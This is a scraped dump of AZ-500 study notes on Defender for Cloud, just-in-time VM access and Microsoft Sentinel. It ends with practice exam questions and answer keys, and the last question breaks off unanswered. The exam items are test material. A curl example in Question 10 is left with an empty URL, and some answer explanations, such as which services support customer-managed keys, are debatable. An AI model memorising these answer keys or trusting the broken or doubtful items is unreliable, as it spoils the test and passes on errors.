• Asset Management (AM): Controls to ensure security visibility and governance over your resources, including recommendations on permissions for security personnel, security access to asset inventory, and managing approvals for services and resources (inventory, track, and correct).
• Logging and Threat Detection (LT): Controls for detecting threats on the cloud and enabling, collecting, and storing audit logs for cloud services, including enabling detection, investigation, and remediation processes with controls to generate high-quality alerts with native threat detection in cloud services; it also includes collecting logs with a cloud monitoring service, centralizing security analysis with a security event management (SEM) solution, time synchronization, and log retention.
• Incident Response (IR): Controls covering the incident response life cycle (preparation, detection and analysis, containment, and post-incident activities), including using Azure services (such as Microsoft Defender for Cloud and Sentinel) and/or other cloud services to automate the incident response process.
• Posture and Vulnerability Management (PV): Controls for assessing and improving the cloud security posture, including vulnerability scanning, penetration testing, and remediation, as well as security configuration tracking, reporting, and correction in cloud resources.
• Endpoint Security (ES): Controls for endpoint detection and response, including the use of endpoint detection and response (EDR) and anti-malware services for endpoints in cloud environments.
• Backup and Recovery (BR): Controls to ensure that data and configuration backups at the different service tiers are performed, validated, and protected.
• DevOps Security (DS): Controls related to security engineering and operations in the DevOps processes, including deployment of critical security checks (such as static application security testing and vulnerability management) prior to the deployment phase to ensure security throughout the DevOps process; it also includes common topics such as threat modeling and software supply chain security.
• Governance and Strategy (GS): Guidance for ensuring a coherent security strategy and documented governance approach to guide and sustain security assurance, including establishing roles and responsibilities for the different cloud security functions, a unified technical strategy, and supporting policies and standards.

2.8. Security policies and Defender for Cloud initiatives

Like security policies, Defender for Cloud initiatives are also created in Azure Policy. You can use Azure Policy to manage your policies, build initiatives, and assign initiatives to multiple subscriptions or entire management groups.

                            The default initiative automatically assigned to every subscription in Microsoft Defender for Cloud is the Microsoft cloud security benchmark.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#29-view-and-edit-security-policies","title":"2.9. View and edit security policies","text":"

                            There are two specific roles for Defender for Cloud:

                            1. Security Administrator: Has the same view rights as security reader. Can also update the security policy and dismiss alerts.
                            2. Security reader: Has rights to view Defender for Cloud items such as recommendations, alerts, policy, and health. Can't make changes.

You can edit security policies through the Azure Policy portal, via the Representational State Transfer Application Programming Interface (REST API), or by using Windows PowerShell.

                            The Security Policy screen reflects the action taken by the policies assigned to the subscription or management group you selected.

• Use the links at the top to open a policy assignment that applies to the subscription or management group. These links let you access the assignment and edit or disable the policy. For example, if you see that a particular policy assignment is effectively denying endpoint protection, use the link to edit or disable the policy.
• In the list of policies, you can see the effective application of the policy on your subscription or management group. The settings of each policy that apply to the scope are taken into consideration, and the cumulative outcome of actions taken by the policy is shown. For example, if one assignment of the policy is disabled, but in another, it's set to AuditIfNotExist, then the cumulative effect applies AuditIfNotExist. The more active effect always takes precedence.
• The policies' effect can be: Append, Audit, AuditIfNotExists, Deny, DeployIfNotExists, or Disabled.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#210-microsoft-defender-for-cloud-recommendations","title":"2.10. Microsoft Defender for Cloud recommendations","text":"

                            In practice, it works like this:

1. Microsoft cloud security benchmark is an initiative that contains requirements.

   For example, Azure Storage accounts must restrict network access to reduce their attack surface.

2. The initiative includes multiple policies, each requiring a specific resource type. These policies enforce the requirements in the initiative.

   To continue the example, the storage requirement is enforced with the policy "Storage accounts should restrict network access using virtual network rules."

3. Microsoft Defender for Cloud continually assesses your connected subscriptions. If it finds a resource that doesn't satisfy a policy, it displays a recommendation to fix that situation and harden the security of resources that aren't meeting your security requirements.

   For example, if an Azure Storage account on your protected subscriptions isn't protected with virtual network rules, you see the recommendation to harden those resources.

So, (1) an initiative includes (2) policies that generate (3) environment-specific recommendations.
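To make step (2) concrete, here is a hedged Az.Resources sketch that assigns the policy named above at subscription scope. The subscription ID is a placeholder, and note that the `Properties` object shape can differ across Az.Resources versions:

```powershell
# Look up the built-in policy definition by its display name (quoted in the text above)
$definition = Get-AzPolicyDefinition | Where-Object {
    $_.Properties.DisplayName -eq "Storage accounts should restrict network access using virtual network rules"
}

# Assign it at subscription scope (placeholder subscription ID)
New-AzPolicyAssignment -Name "restrict-storage-network" `
    -Scope "/subscriptions/<sub-id>" `
    -PolicyDefinition $definition
```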

Defender for Cloud continually assesses your cross-cloud resources for security issues. It then aggregates all the findings into a single score so that you can tell, at a glance, your current security situation: the higher the score, the lower the identified risk level.

In the Azure mobile app, the secure score is shown as a percentage value, and you can tap the secure score to see the details that explain the score.

To increase your security, review Defender for Cloud's recommendations page and remediate each issue by implementing its remediation instructions. Recommendations are grouped into security controls. Each control is a logical group of related security recommendations and reflects your vulnerable attack surfaces. Your score only improves when you remediate all of the recommendations for a single resource within a control.
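A minimal sketch for inspecting the secure score and outstanding recommendations from PowerShell, assuming the Az.Security module is installed and a subscription context is set:

```powershell
# Secure score(s) for the current subscription
Get-AzSecuritySecureScore | Format-List

# A sample of open recommendations (security tasks) to remediate
Get-AzSecurityTask | Select-Object -First 10
```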

• Insights - Gives you extra details for each recommendation, such as:

  • Preview recommendation - This recommendation won't affect your secure score until general availability (GA).
  • Fix - From within the recommendation details page, you can use 'Fix' to resolve this issue.
  • Enforce - From within the recommendation details page, you can automatically deploy a policy to fix this issue whenever someone creates a non-compliant resource.
  • Deny - From within the recommendation details page, you can prevent new resources from being created with this issue.

                            Which recommendations are included in the secure score calculations?

                            • Only built-in recommendations have an impact on the secure score.
                            • Recommendations flagged as Preview aren't included in the calculations of your secure score. They should still be remediated wherever possible so that when the preview period ends, they'll contribute towards your score.
• Preview recommendations are marked as such on the recommendations page.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#211-brute-force-attacks","title":"2.11. Brute force attacks","text":"

                            To counteract brute-force attacks, you can take multiple measures such as:

• Disable the public IP address and use one of these connection methods:
  • Use a point-to-site virtual private network (VPN)
  • Create a site-to-site VPN
  • Use Azure ExpressRoute to create secure links from your on-premises network to Azure
• Require two-factor authentication
• Increase password length and complexity
• Limit login attempts
• Implement CAPTCHA
  • About CAPTCHAs - Any time you let people register on your site or even enter a name and URL (like for a blog comment), you might get a flood of fake names. These are often left by automated programs (bots) that try to leave URLs on every website they can find. (A common motivation is to post the URLs of products for sale.) You can help make sure that a user is a real person and not a computer program by using a CAPTCHA to validate users when they register or otherwise enter their name and site.
  • CAPTCHA stands for Completely Automated Public Turing test to tell Computers and Humans Apart. A CAPTCHA is a challenge-response test in which the user is asked to do something that is easy for a person to do but hard for an automated program to do. The most common type of CAPTCHA is one where you see distorted letters and are asked to type them. (The distortion is supposed to make it hard for bots to decipher the letters.)
• Limit the amount of time that the ports are open.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#just-in-time-vm-access","title":"Just-in-time VM access","text":"

Threat actors actively hunt accessible machines with open management ports, like remote desktop protocol (RDP) or secure shell protocol (SSH). All of your virtual machines are potential targets for an attack. When a VM is successfully compromised, it's used as the entry point to attack further resources within your environment.

Defender for Cloud applies specific logic when deciding how to categorize each supported VM: when it finds a machine that can benefit from JIT, it adds that machine to the recommendation's Unhealthy resources tab.

                            Just-in-time (JIT) virtual machine (VM) access is used to lock down inbound traffic to your Azure VMs, reducing exposure to attacks while providing easy access to connect to VMs when needed. When you enable JIT VM Access for your VMs, you next create a policy that determines the ports to help protect, how long ports should remain open, and the approved IP addresses that can access these ports. The policy helps you stay in control of what users can do when they request access. Requests are logged in the Azure activity log, so you can easily monitor and audit access. The policy will also help you quickly identify the existing VMs that have JIT VM Access enabled and the VMs where JIT VM Access is recommended.
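A minimal sketch that enables JIT on a VM, following the pattern documented for Az.Security's Set-AzJitNetworkAccessPolicy; the IDs, location, and the 3-hour window below are placeholders:

```powershell
# JIT policy for one VM: allow SSH (port 22) to be opened on request,
# for at most 3 hours per request. All IDs are placeholders.
$JitPolicy = @{
    id    = "/subscriptions/<sub-id>/resourceGroups/rg-vms/providers/Microsoft.Compute/virtualMachines/vm1"
    ports = @(@{
        number                     = 22
        protocol                   = "*"
        allowedSourceAddressPrefix = @("*")
        maxRequestAccessDuration   = "PT3H"
    })
}

Set-AzJitNetworkAccessPolicy -Kind "Basic" -Location "westeurope" -Name "default" `
    -ResourceGroupName "rg-vms" -VirtualMachine @($JitPolicy)
```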

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#3-configure-and-monitor-microsoft-sentinel","title":"3. Configure and monitor Microsoft Sentinel","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#31-what-is-microsoft-sentinel","title":"3.1. What is Microsoft Sentinel","text":"

                            Microsoft Sentinel is a scalable, cloud-native, security information event management (SIEM) and security orchestration automated response (SOAR) solution. Microsoft Sentinel delivers intelligent security analytics and threat intelligence across the enterprise, providing a single solution for alert detection, threat visibility, proactive hunting, and threat response.

Think of Microsoft Sentinel as the first SIEM-as-a-service that brings the power of the cloud and artificial intelligence to help security operations teams efficiently identify and stop cyber-attacks before they cause harm.

Microsoft Sentinel integrates with Microsoft 365 solutions and correlates millions of signals from different products, such as:

• Azure Identity Protection
• Microsoft Cloud App Security
• and soon Azure Advanced Threat Protection, Windows Advanced Threat Protection, M365 Advanced Threat Protection, Intune, and Azure Information Protection.

It enables the following services:

                            • Collect data at cloud scale\u00a0across all users, devices, applications, and infrastructure, both on-premises and in multiple clouds.
                            • Detect previously undetected threats, and minimize false positives using Microsoft's analytics and unparalleled threat intelligence.
                            • Investigate threats with artificial intelligence, and hunt for suspicious activities at scale, tapping into years of cyber security work at Microsoft.
                            • Respond to incidents rapidly\u00a0with built-in orchestration and automation of common tasks.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#configure-data-connections-to-sentinel","title":"Configure data connections to Sentinel","text":"

                            To onboard Microsoft Sentinel, these are the global prerequisites:

                            • Active Azure Subscription
                            • Log Analytics workspace.
                            • To enable Microsoft Sentinel, you need contributor permissions to the subscription in which the Microsoft Sentinel workspace resides.
                            • To use Microsoft Sentinel, you need either contributor or reader permissions on the resource group that the workspace belongs to.
                            • Additional permissions may be needed to connect specific data sources.
                            • Microsoft Sentinel is a paid service.

                            Having those, to onboard Microsoft Sentinel, you first need to connect to your security sources.
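As a hedged sketch of these onboarding steps, assuming the Az.OperationalInsights and Az.SecurityInsights modules and placeholder names throughout:

```powershell
# 1. Create the Log Analytics workspace that Sentinel will sit on
New-AzOperationalInsightsWorkspace -ResourceGroupName "rg-sentinel" -Name "law-sentinel" `
    -Location "westeurope" -Sku "PerGB2018"

# 2. Enable Microsoft Sentinel on that workspace
New-AzSentinelOnboardingState -ResourceGroupName "rg-sentinel" -WorkspaceName "law-sentinel" -Name "default"
```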

Microsoft Sentinel comes with a number of connectors for Microsoft solutions, and there are additional built-in connectors to the broader security ecosystem for non-Microsoft solutions. You can also use Common Event Format (CEF), Syslog, or REST API to connect your data sources to Microsoft Sentinel.

                            The following data connection methods are supported by Microsoft Sentinel:

• Service-to-service integration: Some services, such as AWS and Microsoft services, are connected natively. These services leverage the Azure foundation for out-of-the-box integration, and the following solutions can be connected in a few clicks:
                            • Amazon Web Services - CloudTrail
                            • Azure Activity
                            • Microsoft Entra audit logs and sign-ins
                            • Microsoft Entra ID Protection
                            • Azure Advanced Threat Protection
                            • Azure Information Protection
                            • Microsoft Defender for Cloud
                            • Cloud App Security
                            • Domain name server
                            • Microsoft 365
                            • Microsoft Defender ATP
                            • Microsoft web application firewall
                            • Windows firewall
                            • Windows security events

                            External solutions

• API: Some data sources are connected using APIs that are provided by the connected data source. Typically, most security technologies provide a set of APIs through which event logs can be retrieved. The APIs connect to Microsoft Sentinel, gather specific data types, and send them to Azure Log Analytics.
                            • Agent: The Microsoft Sentinel agent, which is based on the Log Analytics agent, converts CEF formatted logs into a format that can be ingested by Log Analytics. Depending on the appliance type, the agent is installed either directly on the appliance, or on a dedicated Linux server. To connect your external appliance to Microsoft Sentinel, the agent must be deployed on a dedicated machine (VM or on-premises) to support the communication between the appliance and Microsoft Sentinel. You can deploy the agent automatically or manually. Automatic deployment is only available if your dedicated machine is a new VM you are creating in Azure. Alternatively, you can deploy the agent manually on an existing Azure VM, on a VM in another cloud, or on an on-premises machine.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#32-create-workbooks-to-monitor-sentinel-data","title":"3.2. Create workbooks to monitor Sentinel data","text":"

                            After onboarding to Microsoft Sentinel, monitor your data using the Azure Monitor workbooks integration.

                            After you connect your data sources to Microsoft Sentinel, you can monitor the data using the Microsoft Sentinel integration with Azure Monitor Workbooks, which provides versatility in creating custom workbooks. While Workbooks are displayed differently in Microsoft Sentinel, it may be helpful for you to determine how to create interactive reports with Azure Monitor Workbooks. Microsoft Sentinel allows you to create custom workbooks across your data and comes with built-in workbook templates to quickly gain insights across your data as soon as you connect a data source.

Workbooks are intended for Security operations center (SOC) engineers and analysts of all tiers to visualize data. Workbooks are best used for high-level views of Microsoft Sentinel data and don't require coding knowledge.

                            You can't integrate workbooks with external data.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#33-enable-rules-to-create-incidents","title":"3.3. Enable rules to create incidents","text":"

                            To help you reduce noise and minimize the number of alerts you have to review and investigate, Microsoft Sentinel uses analytics to correlate alerts into incidents.

                            Incidents are groups of related alerts that indicate an actionable possible threat you can investigate and resolve.

                            You can use the built-in correlation rules as-is or as a starting point to build your own.

                            Microsoft Sentinel also provides machine learning rules to map your network behavior and then look for anomalies across your resources.
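A hedged Az.SecurityInsights sketch of a scheduled analytics rule of the kind described above; the rule name, KQL query, and thresholds are illustrative only:

```powershell
# Scheduled rule: alert when the query returns more than 100 rows per hourly run.
# Workspace and resource group names are placeholders.
New-AzSentinelAlertRule -ResourceGroupName "rg-sentinel" -WorkspaceName "law-sentinel" `
    -Scheduled -Enabled -DisplayName "Mass sign-in failures" -Severity Medium `
    -Query "SigninLogs | where ResultType != 0 | summarize count() by IPAddress" `
    -QueryFrequency (New-TimeSpan -Hours 1) -QueryPeriod (New-TimeSpan -Hours 1) `
    -TriggerOperator GreaterThan -TriggerThreshold 100
```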

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#34-configure-playbooks","title":"3.4. Configure playbooks","text":"

                            Automate your common tasks and simplify security orchestration with playbooks that integrate with Azure services and your existing tools.

To build playbooks with Azure Logic Apps, you can choose from a growing gallery of built-in playbooks. These include 200 or more connectors for services, such as Azure Functions, that allow you to apply custom logic in code. Connectors include:

                            • ServiceNow
                            • Jira
                            • Zendesk
                            • HTTP requests
                            • Microsoft Teams
                            • Slack
                            • Microsoft Entra ID
                            • Microsoft Defender for Endpoint
                            • Microsoft Defender for Cloud Apps

                            For example, if you use the ServiceNow ticketing system, use Azure Logic Apps to automate your workflows and open a ticket in ServiceNow each time a particular alert or incident is generated.

Playbooks are intended for Security operations center (SOC) engineers and analysts of all tiers to automate and simplify tasks, including data ingestion, enrichment, investigation, and remediation. Playbooks work best with single, repeatable tasks and don't require coding knowledge. Playbooks aren't suitable for ad-hoc or complex task chains or for documenting and sharing evidence.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#35-hunt-and-investigate-potential-breaches","title":"3.5. Hunt and investigate potential breaches","text":"

                            Microsoft Sentinel deep investigation tools help you to understand the scope and find the root cause of a potential security threat.

Interactive graph - You can choose an entity on the interactive graph to ask interesting questions for a specific entity and drill down into that entity and its connections to get to the root cause of the threat.

Built-in queries - Use Microsoft Sentinel's powerful hunting search-and-query tools, based on the MITRE framework, which enable you to proactively hunt for security threats across your organization's data sources before an alert is triggered. While hunting, create bookmarks to return to interesting events later. Use a bookmark to share an event with others or group events with other correlating events to create a compelling incident for investigation.

                            Microsoft Sentinel supports Jupyter notebooks in Azure Machine Learning workspaces, including full machine learning, visualization, and data analysis libraries:

                            • Perform analytics that isn't built into Microsoft Sentinel, such as some Python machine learning features.
                            • Create data visualizations that aren't built into Microsoft Sentinel, such as custom timelines and process trees.
                            • Integrate data sources outside of Microsoft Sentinel, such as an on-premises data set.

Notebooks are intended for threat hunters or Tier 2-3 analysts, incident investigators, data scientists, and security researchers. They have a steeper learning curve and require coding knowledge. They have limited automation support.

                            Notebooks in Microsoft Sentinel provide:

                            • Queries to both Microsoft Sentinel and external data
                            • Features for data enrichment, investigation, visualization, hunting, machine learning, and big data analytics

                            Notebooks are best for:

                            • More complex chains of repeatable tasks
                            • Ad-hoc procedural controls
                            • Machine learning and custom analysis

                            Notebooks support rich Python libraries for manipulating and visualizing data. They're useful for documenting and sharing analysis evidence.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-exams/","title":"My 100 selected questions to warm up for the AZ-500 certificate","text":"

These questions form the hard core of my question bank. They originate from various sources, including Udemy, Microsoft's free practice assessments, and YouTube videos. Successfully completing these questions does not guarantee approval for the AZ-500 exam, but it does provide a good indicator of where you stand.

Sources of these notes
• The Microsoft e-learn platform.
• Book: "Microsoft Certified - MCA Microsoft Certified Associate Azure Security Engineer Study Guide: Exam AZ-500".
• Udemy course: AZ-500 Microsoft Azure Security Technologies Exam Prep.
• Udemy course: Azure Security: AZ-500 (updated July 2023).
                            Summary: AZ-500 Microsoft Azure Security Engineer Certification
                            • About the certificate
                            • I. Manage Identity and Access
                            • II. Platform protection
                            • III. Data and applications
                            • IV. Security operations
                            • AZ-500 and more: keep learning

                            Cheatsheets: Azure-CLI | Azure PowerShell

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-1","title":"Question 1","text":"

                            You have custom alert rules in Microsoft Sentinel. The rules exceed the query length limitations. You need to resolve the issue. Which function should you use for the rule? Select only one answer.

                            • ADX functions
                            • Azure functions with a timer trigger
                            • stored procedures
                            • user-defined functions
                            See response

                            You can use user-defined functions to overcome the query length limitation. Timer trigger runs in a scheduled manner (pull, not push). Using ADX functions to create Azure Data Explorer queries inside the Log Analytics query window is unsupported. Stored procedures are unsupported by Azure Data Explorer.
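As a hedged illustration, a workspace function can be created from PowerShell with Az.OperationalInsights' New-AzOperationalInsightsSavedSearch and its -FunctionAlias parameter, so a rule can call the alias instead of inlining the long query. All names and the query body are illustrative:

```powershell
# Save a query fragment as a workspace function named "FailedSignins";
# an analytics rule can then reference the alias to stay under the length limit.
New-AzOperationalInsightsSavedSearch -ResourceGroupName "rg-sentinel" -WorkspaceName "law-sentinel" `
    -SavedSearchId "FailedSignins" -DisplayName "Failed sign-ins helper" -Category "SentinelHelpers" `
    -Query "SigninLogs | where ResultType != 0" -FunctionAlias "FailedSignins"
```

The rule's query then shortens to something like `FailedSignins | summarize count() by IPAddress`.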

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-2","title":"Question 2","text":"

                            You have an Azure Kubernetes Service (AKS) cluster named AKS1. You are configuring network isolation for AKS1. You need to limit which IP addresses can access the Kubernetes control plane. What should you do? Select only one answer.

                            • Configure API server authorized IP ranges.
                            • Configure Azure Front Door.
                            • Customize CoreDNS for AKS.
                            • Implement Open Service Mesh AKS add-on.
                            See response

                            The \"Open Service Mesh AKS add-on\" is designed to enhance communication and control between services within an Azure Kubernetes Service (AKS) cluster, offering features like service discovery, load balancing, and observability. However, it is not directly related to the task of limiting IP addresses that can access the Kubernetes control plane. Configuring API server authorized IP ranges is the correct approach for controlling access to the control plane by specifying which IP addresses or IP ranges are allowed to interact with the Kubernetes API server. The Open Service Mesh AKS add-on addresses a different aspect of AKS management, focusing on service-to-service communication, making it less relevant for the specific task of network isolation and control of the Kubernetes control plane. Azure Front Door is a global service for routing and load balancing traffic. It is not designed for controlling access to the Kubernetes control plane. Front Door is used for directing and optimizing the delivery of web applications, and it doesn't offer the fine-grained control needed to limit access to the Kubernetes API server. CoreDNS is a DNS server used within Kubernetes clusters for service discovery. While CoreDNS can play a role in the internal DNS resolution within the cluster, it is not a tool for restricting access to the Kubernetes control plane. Customizing CoreDNS is generally related to DNS resolution configurations and would not address the task of limiting IP addresses that can access the control plane.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-3","title":"Question 3","text":"

                            Your company has an Azure subscription and an Amazon Web Services (AWS) account. You plan to deploy Kubernetes to AWS. You need to ensure that you can use Azure Monitor Container insights to monitor container workload performance. What should you deploy first? Select only one answer.

                            • AKS Engine
                            • Azure Arc-enabled Kubernetes
                            • Azure Container Instances
                            • Azure Kubernetes Service (AKS)
                            • Azure Stack HCI
                            See response

                            Azure Arc-enabled Kubernetes is the only configuration that includes Kubernetes and can be deployed to AWS.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-4","title":"Question 4","text":"

                            You have an Azure subscription that contains a virtual machine named VM1. VM1 is configured with just-in-time (JIT) VM access. You need to request access to VM1. Which PowerShell cmdlet should you run? Select only one answer.

                            • Add-AzNetworkSecurityRuleConfig
                            • Get-AzJitNetworkAccessPolicy
                            • Set-AzJitNetworkAccessPolicy
                            • Start-AzJitNetworkAccessPolicy
                            See response

The Start-AzJitNetworkAccessPolicy PowerShell cmdlet is used to request access to a JIT-enabled virtual machine. Set-AzJitNetworkAccessPolicy is used to enable JIT on a virtual machine. Get-AzJitNetworkAccessPolicy and Add-AzNetworkSecurityRuleConfig are not used to request access. When you run Start-AzJitNetworkAccessPolicy, you request access to a VM for a specific period, during which access is allowed through temporarily modified network security group (NSG) rules. After the requested time window expires, the NSG rules revert to their previous state, revoking the temporary access.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-5","title":"Question 5","text":"

                            You have an Azure subscription. You plan to use the\u00a0az aks create\u00a0command to deploy an Azure Kubernetes Service (AKS) cluster named AKS1 that has Azure AD integration. You need to ensure that local accounts cannot be used on AKS1. Which flag should you use with the command? Select only one answer.

                            • disable-local-accounts
                            • generate-ssh-keys
                            • kubelet-config
                            • windows-admin-username
                            See response

                            When deploying an AKS cluster, local accounts are enabled by default. Even when enabling RBAC or Azure AD integration, --admin access still exists essentially as a non-auditable backdoor option. To disable local accounts on an AKS cluster, you should use the\u00a0--disable-local-accounts\u00a0flag with the\u00a0az aks create\u00a0command. The remaining options do not remove local accounts.
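As a minimal sketch of such a deployment with local accounts disabled; the resource group RG1 is a placeholder, and the Azure AD integration flags reflect common usage:

az aks create \
  --resource-group RG1 \
  --name AKS1 \
  --enable-aad \
  --enable-azure-rbac \
  --disable-local-accounts \
  --generate-ssh-keys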

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-6","title":"Question 6","text":"

                            You need to enable encryption at rest by using customer-managed keys (CMKs). Which two services support CMKs? Each correct answer presents a complete solution. Select all answers that apply.

                            • Azure Blob storage
                            • Azure Disk Storage
                            • Azure Files
                            • Azure NetApp Files
                            • Log Analytics workspace
                            See response

                            Azure Files and Azure Blob Storage

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-7","title":"Question 7","text":"

                            You implement dynamic data masking for an Azure Synapse Analytics workspace. You need to provide only a user named User1 with the ability to see the data. What should you do? Select only one answer.

                            • Create a Conditional Access policy for Azure SQL Database, and then grant access.
                            • Grant the UNMASK permission to User1.
                            • Use the\u00a0ALTER TABLE\u00a0statement to drop the masking function.
                            • Use the\u00a0ALTER TABLE\u00a0statement to edit the masking function.
                            See response

                            Granting the UNMASK permission to User1 removes the mask from User1 only. Creating a Conditional Access policy for Azure SQL Database, and then granting access is not enough for User1 to see the data, only to sign in. Using the\u00a0ALTER TABLE\u00a0statement to edit the masking function affects all users. Using the\u00a0ALTER TABLE\u00a0statement to drop the masking function removes the mask altogether.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-8","title":"Question 8","text":"

                            You need to provide public anonymous access to a file in an Azure Storage account. The solution must follow the principle of least privilege. Which two actions should you perform? Each correct answer presents part of the solution. Select all answers that apply.

                            • For the container, set Public access level to\u00a0Blob.
                            • For the container, set Public access level to\u00a0Container.
                            • For the storage account, set Blob public access to\u00a0Disabled.
                            • For the storage account, set Blob public access to\u00a0Enabled.
                            See response

Unless prevented by another setting, setting the container's Public access level to\u00a0Blob\u00a0allows public access to blobs only. Setting Blob public access to\u00a0Enabled\u00a0on the storage account is a prerequisite for setting the access level of a container or blob. Setting Blob public access to\u00a0Disabled\u00a0prevents any public access, and setting Public access level to\u00a0Container\u00a0exposes all current and future blobs in the container, which does not follow the principle of least privilege.
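As a minimal sketch, both actions can be performed with the Azure CLI; the account name storage1, resource group RG1, and container name files are placeholders:

az storage account update --name storage1 --resource-group RG1 --allow-blob-public-access true
az storage container set-permission --account-name storage1 --name files --public-access blob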

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-9","title":"Question 9","text":"

                            You have an application that will securely share files hosted in Azure Blob storage to external users. The external users will not use Azure AD to authenticate. You plan to share more than 1,000 files. You need to restrict access to only a single IP address for each file. What should you do? Select only one answer.

                            • Configure a storage account firewall.
• Generate a service SAS that includes the signedIP field.
• Set the Allow public anonymous access setting for the storage account.
                            • Set the Secure transfer required setting for the storage account.
                            See response

Generating a service SAS that includes the signedIP field allows each SAS to be created by using an account key and restricted to a single allowed IP address. The storage account firewall does not allow more than 200 IP address rules, so it cannot cover more than 1,000 files each tied to its own IP address. Setting the Allow public anonymous access setting for the storage account does not restrict access by IP address. Setting the Secure transfer required property for the storage account prevents HTTP access, but it does not limit where the access request originates from.
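As a minimal sketch, a per-file service SAS with an allowed IP can be generated with the Azure CLI; the account, key, container, blob, expiry, and IP values are placeholders:

az storage blob generate-sas \
  --account-name storage1 \
  --account-key <account-key> \
  --container-name files \
  --name report1.pdf \
  --permissions r \
  --expiry 2025-01-01T00:00:00Z \
  --ip 203.0.113.15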

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-10","title":"Question 10","text":"

You have an Azure virtual machine named VM1 that runs Windows Server 2022. A programmer is writing code to run on VM1. The code will use the system-assigned managed identity assigned to VM1 to access Azure resources. Which endpoint should the programmer use to request the authentication token required to access the Azure resources?

                            • Azure AD v1.0.
                            • Azure AD v2.0.
• Azure Resource Manager.
                            • Azure Instance Metadata Service.
                            See response

                            Azure Instance Metadata Service is a REST endpoint accessible to all IaaS virtual machines created via Azure Resource Manager (ARM). The endpoint is available at a well-known non-routable IP address (169.254.169.254) that can be accessed only from the virtual machines. The endpoint is used to request the authentication token required to gain access to the Azure resources. Azure AD v1.0 and Azure AD v2.0 endpoints are used to authenticate work and school accounts, not managed identities. The ARM endpoint is where the authentication token is sent by the code once it is obtained from the Azure Instance Metadata Service.
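As an illustration of the flow described above, code on VM1 can request a token for Azure Resource Manager from the IMDS endpoint; the api-version shown is one commonly documented value and may differ in current documentation:

curl -s -H 'Metadata: true' ''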

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-11","title":"Question 11","text":"

**You are managing permission scopes for an Azure AD app registration. What are three OpenID Connect scopes that you can use? Each correct answer presents a complete solution.**

                            • email
                            • openID
                            • phone
                            • offline_access
                            See response

                            The openID scope appears on the work account consent page as the Sign you in permission. The email scope gives the app access to a user's primary email address in the form of the email claim. The offline_access scope gives your app access to resources on behalf of a user for an extended time. On the consent page, this scope appears as the Maintain access to data you have given it access to permission.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-12","title":"Question 12","text":"

                            You have a resource group named RG1 that contains an Azure virtual machine named VM1. A user named User1 is assigned the Contributor role for RG1. You need to prevent User1 from modifying the properties of VM1. What should you do?

• Add a deny assignment for\u00a0Microsoft.Compute/virtualMachines/*\u00a0in the VM1 scope.
                            • Apply a read-only lock to the RG1 scope.
                            See response

A read-only lock applied to the RG1 scope prevents all users, including User1, from modifying the properties of VM1 and the other resources in the resource group; note that a read-only lock on a resource group that contains a virtual machine also prevents all users from starting or restarting it. The Contributor role assignment is set at the resource group level and inherited by the resource, so it would have to be edited at its original scope. You cannot directly create your own deny assignments: while you can create custom roles with specific permissions and assign them to users, Azure RBAC does not provide a mechanism for explicitly denying users specific actions at the resource level. To restrict access, you typically grant a less permissive role or apply a resource lock (such as a read-only lock, which prevents modifications) rather than attempting to create deny assignments, which are not a standard part of Azure RBAC.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-13","title":"Question 13","text":"

**You have an Azure subscription that contains an Azure AD tenant and an Azure web app named App1. A user named User1 needs permission to manage App1. The solution must follow the principle of least privilege. Which role should you assign to User1?**

• Cloud Application Administrator
• Application Administrator
• Cloud App Security Administrator
• Application Developer
                            See response

                            Correct: Cloud Application Administrator \u2013 Since App1 is an app in Azure, this role provides administrative permissions to App1 and follows the principle of least privilege. Incorrect: Application Administrator \u2013 This role provides administrative permissions to App1 but also provides additional permissions to the app proxy for on-premises applications. Incorrect: Cloud App Security Administrator \u2013 This role is specific to the Microsoft Defender for Cloud Apps solution. Incorrect: Application Developer \u2013 This role allows the user to create registrations but not manage applications.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-14","title":"Question 14","text":"

                            You have an Azure subscription that contains a virtual machine named VM1 and a storage account named storage1. You need to ensure that VM1 can access storage1 over the Azure backbone network. What should you implement?

                            • Service endpoints
                            • Private endpoints
                            • A subnet
                            • A VPN gateway
                            See response

